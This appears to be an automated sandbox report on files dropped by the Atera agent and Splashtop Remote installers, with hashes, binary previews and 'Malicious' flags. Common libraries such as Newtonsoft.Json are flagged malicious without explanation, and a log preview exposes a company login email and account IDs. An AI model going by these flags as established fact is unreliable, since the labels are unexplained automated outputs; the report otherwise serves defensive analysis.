                                                                                                                                                                                                                                                                                                                                  SHA-512:80F01447B43525DBDF5B283522FE14D9AECEF16E55EA3FE36DC0A94B53C49E03BB56136F0911C348FB78FB5AF6112B1DE7C38CBFFBD73ACB2971655EF1B2B859
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.418295834054489
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhXSjn:WBa
                                                                                                                                                                                                                                                                                                                                  MD5:7E9C5492C1485A2AE94A108F6FFEEA95
                                                                                                                                                                                                                                                                                                                                  SHA1:F00A6A35F3D41AFF9ED2C028C26D918EEF06B715
                                                                                                                                                                                                                                                                                                                                  SHA-256:04CA73099B2058974220319A7CC3E156AE24AFA13B28F340E8D97B021D1BBC95
                                                                                                                                                                                                                                                                                                                                  SHA-512:191B4297645813DD163611547EC2708BD6678E535429FC4D771472BC185C887CAF24FAAA7F1DCF78577739E3D06387A756A11193C68918DDF47D21328CA1E4DC
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=27.2

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):96816
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.179944898759355
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:XJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvC7Hxwm:XQUm2H5KTfOLgxFJjE50vksVUfPvCz
                                                                                                                                                                                                                                                                                                                                  MD5:9A344D6A16A6FEF791701FC52FA722A2
                                                                                                                                                                                                                                                                                                                                  SHA1:7F1CEF75650CA626D79F7F15818851A9C297F65E
                                                                                                                                                                                                                                                                                                                                  SHA-256:80890B7E8F3CC557A87BB1F84C7C30CA9B08B3F8AA68184D99439305EF91388E
                                                                                                                                                                                                                                                                                                                                  SHA-512:93ED10309A2EA138FE31BE55F82627290DDA0F8B7AEA63A54D97BB6EF2985BCC0449FCCC288DEF154D9F3318FB4DA9CAC3FBB4727986997DD1CDD5C97541139E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.d.........." ..0..H..........zf... ........... ....................................`.................................(f..O.......8............R..0(...........d............................................... ............... ..H............text....F... ...H.................. ..`.rsrc...8............J..............@..@.reloc...............P..............@..B................\f......H........k..D............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):186416
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.934478472448458
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:6kfZS7FUguxN+77b1W5GR69UgoCaf8/BCnfKlRUjW01KyFes:0+c7b1W4R6joxfQ8p
                                                                                                                                                                                                                                                                                                                                  MD5:A68241D6E026F218B259FD2CE8F744C0
                                                                                                                                                                                                                                                                                                                                  SHA1:DEA3F011BBC728DB750A054CCF3C5FDFE583EB91
                                                                                                                                                                                                                                                                                                                                  SHA-256:B0F5B75176B338F03AF4BB287259F36167D86C7A6EF128FE021B7401854F2362
                                                                                                                                                                                                                                                                                                                                  SHA-512:1CBFA69C0F75ADAC4C61A84A803201E1897B2A24E50570C44048C6DDAB57A03A1DEBEE04671A8F1FE83745ECD8A91447A4E4E10611811A8B136B3B2016EAD119
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&..Z.........." ..0...... ......~.... ........... ...............................P....@.................................,...O.......................0(........................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):331824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.168966743027853
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:KBhhiUWKJzPZNRntAXIjxs2f5Jg53XWlvidurmdIq8KmefViYkJTVBXi3VaKtNTe:KDMUWITZznu85k8Wdn8KmCjIFi3VvC
                                                                                                                                                                                                                                                                                                                                  MD5:DE6B588BD13AFFC760EE32D105C77A21
                                                                                                                                                                                                                                                                                                                                  SHA1:F9D20F683938F0347F0C2782D0E05FCFA143CEE1
                                                                                                                                                                                                                                                                                                                                  SHA-256:07762DCF4082B9A14BEC37573058015F03D26B46B9A6B7B0C0E66402CBE256F1
                                                                                                                                                                                                                                                                                                                                  SHA-512:6D0947E89ED1BF942C6BB93309BDD45B83FD92A3B8D0C4E3265A581DB9318B88187BDE5A58CFB5EE3A7BFE48167D4438B85D9FF03283C73A97B1C6022FE7CBCE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... .......................@...........@.....................................O.......................0(... ..........T............................................ ............... ..H............text...<.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H............9..............H.............................................{....*..{....*V.(......}......}....*...0..A........u3.......4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ..<. )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q6....6...-.&.+...6...o.....%..{.......%q7....7...-.&.+...7...o.....(....*..{....*..{....*..{....*r.(......}......}......}....*..0..Y........u8.......L.,G(.....{.....{....o....,/(.....{.....{....o....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.9607419702126485
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:cBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUZ:cBjk38WuBcAbwoA/BkjSHXP36RMGw
                                                                                                                                                                                                                                                                                                                                  MD5:C2EBB296A9B097C4BC36018341C2F514
                                                                                                                                                                                                                                                                                                                                  SHA1:55B79CCD4F93AC6EF3AE6E2AD858DE5F23516EC9
                                                                                                                                                                                                                                                                                                                                  SHA-256:3CFB2C5E1947565F0795FCF5C0587B8F021842D52E79A40F25070BCABCE48089
                                                                                                                                                                                                                                                                                                                                  SHA-512:BF95FA3B93A25E040D3521BF8436BBA505D09F659360C0606F259607083D9C4F1366683CFE0215D4F13CE875E753B12F1DE058A3D0CBB84C3948644D0E7BDEEB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ....../t....`....................................O.......................0(.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\System.Management.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):55856
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.2394409505734165
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:rREoc0f5k1KlLoz0WOySMEpnSO7iX16UJKdiYpBEpYinAMxCWLa:rR8+5k15z0WBZEtgwJq7Hx3u
                                                                                                                                                                                                                                                                                                                                  MD5:89D62604A1CA22A2F8FFD987B543D38E
                                                                                                                                                                                                                                                                                                                                  SHA1:64D7D345821AA76971BB9EF71CE731CCD9BFAC32
                                                                                                                                                                                                                                                                                                                                  SHA-256:80D4A38A5C0F117AFC7FC74A3F2DA39259BDD980BBA85687FF2019C8262E171D
                                                                                                                                                                                                                                                                                                                                  SHA-512:1173C7AFE2719EF324342A6D3EA459319533843CFE8A04CDC63FCF3D8A2D6DC4BB537FC1A4DBA63F585EB11F3E16FB2F17C53BC64BC7318A52B44266A3A9A56E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....<V.........." ..0.................. .........c. ....................... .......e....`.................................P...O.......H...............0(........................................................... ............... ..H............text........ ...................... ..`.rsrc...H...........................@..@.reloc..............................@..B........................H........".................."..P............................................................................................0.......................0.......................................................................................0...............0...................................................................................................0...............0...................................................0...............0..........................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):602672
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                                                                                                                  MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                                                                                                                  SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                                                                                                                  SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                                                                                                                  SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............." ..0............." ... ...@....... ....................................`.....................................O....@..|...............0(...`..........T............................................ ............... ..H............text...(.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................. ......H............{..................x.......................................r.(......}......}......}....*....0..,........-..{.....o...+.+..{.....{....s.....o...+..*V.(......}......}....*...0...................-..+..o....s"........o$......o,....,..o....,...,....o(........,...oH...,...o......+.......9......o....,..{......o....o....o......s..........o&...8.....{......o....o........9e.....o.....?X.....r...po....9G.....r...po....o....r...p.( ...9&.....r...po....9......r...po....o.....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):73264
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                                                                                                                  MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                                                                                                                  SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                                                                                                                  SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                                                                                                                  SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`.......f....@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\log.txt

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):272
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.133534505163303
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:A455XeQw9w3pKFSQFISk2GIHmWzkfIgDGzkfcgDX:551ekMSQFhB5lstX
                                                                                                                                                                                                                                                                                                                                  MD5:3FE3FCA4356D1CE726FA939D66F5B505
                                                                                                                                                                                                                                                                                                                                  SHA1:33B71DB013F669E83DDBB52F333E54E05485DB45
                                                                                                                                                                                                                                                                                                                                  SHA-256:6828071DF5A286E9726E44CE0AA59E74CD1679544A8813B45BFCB6D46BB9EE92
                                                                                                                                                                                                                                                                                                                                  SHA-512:AEF0BE3D87630B113F1387647E90A3D7F07B091DE188B2BAA7915CD5F421E1B9ACF45C4286E0013B6A02B014295E9CCFA8B20CD5D704C2ECAA9EE0F8F8C34ABD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:/i /IntegratorLogin=000111.financeiro@yamahaconcessionaria.com.br /CompanyId=1 /IntegratorLoginUI= /CompanyIdUI= /FolderId= /AccountId=001Q300000LlkxmIAB /AgentId=bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2.30/10/2024 18:30:08 Trace Starting..30/10/2024 18:30:26 Trace Starting..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Acknowledgements.htm

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Algol 68 source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):157873
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.753497932507659
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:ZHXt/BWDLm8arfT4h6+2j+S64ioX+g15titNI6cSM:gDLmtrfT4hj2ju0X9wGSM
                                                                                                                                                                                                                                                                                                                                  MD5:AB3D7C0401590BBDAF4B3C84592D24D6
                                                                                                                                                                                                                                                                                                                                  SHA1:756F86B49CA2035638F77BBEB60CFE6A827B553E
                                                                                                                                                                                                                                                                                                                                  SHA-256:4428A8B3F1A63312918FF5F8E1D5EE1F6EEBA9D73A336721338D494D2B6E5F6C
                                                                                                                                                                                                                                                                                                                                  SHA-512:24AAC8D02347EF3E226531CA15B71714CB53546C7AA1B4D961A72E097C3528AE2590B00ECBAA7E80815E99FAFB6919D234E957DFCD08467CD753B24C004B6124
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:<pre>Acknowledgments....This Splashtop software incorporates materials from third parties, the use of which is hereby acknowledged.....================================================================....AES....Copyright (c) 1998-2010, Brian Gladman, Worcester, UK. All rights reserved.....The redistribution and use of this software (with or without changes)..is allowed without the payment of fees or royalties provided that:.... source code distributions include the above copyright notice, this.. list of conditions and the following disclaimer;.... binary distributions include the above copyright notice, this list.. of conditions and the following disclaimer in their documentation.....This software is provided 'as is' with no explicit or implied warranties..in respect of its operation, including, but not limited to, correctness..and fitness for purpose.....================================================================....CELT....Copyright 2001-2009 Jean-Marc Valin, Timothy B. Terri

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\BdEpSDK.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):310280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.406682858396138
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:B2ewUPD+fCEWepqJ1u45FC9xrIaPXiyVfl/7RohyyP16+Dfj8d3:NRPD+KLepIu4qnrIBy/7RoPfO
                                                                                                                                                                                                                                                                                                                                  MD5:FB1A6F0CB84ACB237FF0E42E5CF876A6
                                                                                                                                                                                                                                                                                                                                  SHA1:6CDEBFA5ABBF7BA48179DFF13A1343F3C4D9348F
                                                                                                                                                                                                                                                                                                                                  SHA-256:DA5E12D077875B4F93210B10689F28B6EF33480E3BD2362E80F11EDFF8C9966D
                                                                                                                                                                                                                                                                                                                                  SHA-512:2602908AB2FAF07C1957DAD00960F6432D08BDD7327DB96D1338C87B1E18CB025B381378BA4BC800F558D26D76922E5882481A99B17575D3D48208C289EE3B8D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........PC..C..C......H.............Q....R....I...........F..C../..W...B..W.[.B..C.3.B..W...B..RichC..........................PE..d.....0e.........."....$............H..........@.....................................u....`..................................................F..<.......H.......H'.......(..........@...p...............................@............................................text............................... ..`.rdata...@.......B..................@..@.data....+...`.......F..............@....pdata..H'.......(...Z..............@..@_RDATA..\...........................@..@.rsrc...H...........................@..@.reloc..............................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\BdEpSDK_x86.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):249864
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.627715385431378
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:gbNEPN9Db8oxccZd8lZOWb1yBGAOnpe6nbXcw:gc/8oxc5yBGVpJbXcw
                                                                                                                                                                                                                                                                                                                                  MD5:151AAE6C0F0E40AB4138AF953768AB37
                                                                                                                                                                                                                                                                                                                                  SHA1:18F55A0707EE7140776D7857D0AF56D471289960
                                                                                                                                                                                                                                                                                                                                  SHA-256:F253CE8A8C4CDC4FD7A93A04515B208D461FF6E4076F64431E7EC7E9E5E08923
                                                                                                                                                                                                                                                                                                                                  SHA-512:40FFF8741C8AFB0EF2E6F8F69755F8A2E1F6422943341BBE680EEEFE939731F39E59D1C608B7C23AA649C3F2D93E6104E6B420A755F551F555504E1028B91C68
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.B.>},.>},.>},.../.3},...)..},...(.(},...(./},.../.+},...).q},...-.;},.>}-.]},.*.%.?},.*..?},.>}..?},.*...?},.Rich>},.........................PE..L...+.0e...............$.....2....................@.......................................@................................. p..<.......H................(....... ...H..p........................... H..@...............h............................text............................... ..`.rdata..J...........................@..@.data...p............n..............@....rsrc...H...........................@..@.reloc... ......."..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\64bits\stgamepad.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):40160
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.316240044981803
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3z+6yz3JqnYCblcp6wOmMQC4cT3AZ21w6LuOBjEwXxyvJ3GB1C2GCTaZum8e:3ByY12kwOm8s2diSXCIB1yC2HT
                                                                                                                                                                                                                                                                                                                                  MD5:1033D6EFB14B7C8308A261E7151A8FDD
                                                                                                                                                                                                                                                                                                                                  SHA1:C331C67E93DA33EAAAAA0A4033855F185A79DE99
                                                                                                                                                                                                                                                                                                                                  SHA-256:6A14EFEE1EAD8592B0E5199DB4E7256462F135D6DC10A803D98D03CFC4F1E678
                                                                                                                                                                                                                                                                                                                                  SHA-512:083C365FD00BDED1637CBA2DDCE2FC3D93A8C60122F01CCD675A13EFF4C7663EE0FCE1B3316755FC971B3A3E6D242E29236180508D03C803950E2159B374767B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........wU.............f.......f...............f.......f.......f.......f.......f.......f......Rich............................PE..d...7.#R.........."......`..........t..........................................................................................................(.......P....`..x...............4....B...............................................@...............................text....".......$.................. ..h.rdata.......@.......(..............@..H.data... ....P.......4..............@....pdata..x....`.......8..............@..HPAGE....f0...p...2...<.............. ..`INIT.................n.............. ....rsrc...P............x..............@..B.reloc...............~..............@..B........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\install_driver.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):224
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.68750285687923
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajs/dCiI4FDIIlfILQIIbdELV0Lr+FDIIGKhaL3C:kidCiRxt2QjdRCxeKcL3C
                                                                                                                                                                                                                                                                                                                                  MD5:EBC2A6216B737E813732ECA1BB1F2AF2
                                                                                                                                                                                                                                                                                                                                  SHA1:6E63AB58C2055A3F276C1CD36FA406E37C099099
                                                                                                                                                                                                                                                                                                                                  SHA-256:275C9771ED3AC2ABE0989A114804ADD0CCED09F8A1BFF1633C4F79929921713B
                                                                                                                                                                                                                                                                                                                                  SHA-512:248CD17E4836B429DF0923E8C04FD3F8ECAB7CC8BFF6761F06AAED420111FF5DBADCC974193701DEBF63655CD79E8E0D0B6C7599760B13ABA19B5C0E178BF7EC
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\devcon.exe /r remove root\stgamepad >> inst.log..utils\DIFxCmd.exe /u stgamepad.inf >> inst.log..utils\devcon.exe install stgamepad.inf root\stgamepad >> inst.log..utils\enum.exe -p 1000 >> inst.log

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\install_driver64.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
